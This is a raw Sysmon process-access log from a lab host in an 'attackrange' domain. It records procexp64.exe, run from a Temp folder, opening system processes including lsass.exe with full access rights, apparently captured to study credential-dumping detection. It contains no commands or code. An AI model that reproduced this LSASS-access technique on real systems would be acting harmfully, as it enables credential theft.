15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784980Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784979Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784978Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784977Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784976Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784975Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784974Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784973Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784972Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784971Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784970Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784969Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784968Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784967Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784966Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785089Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785088Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785087Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785086Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785085Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785084Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785083Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785082Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785081Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785080Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785079Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785078Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785077Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785076Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785075Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785074Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785073Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785072Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785071Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785070Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785069Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785068Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program 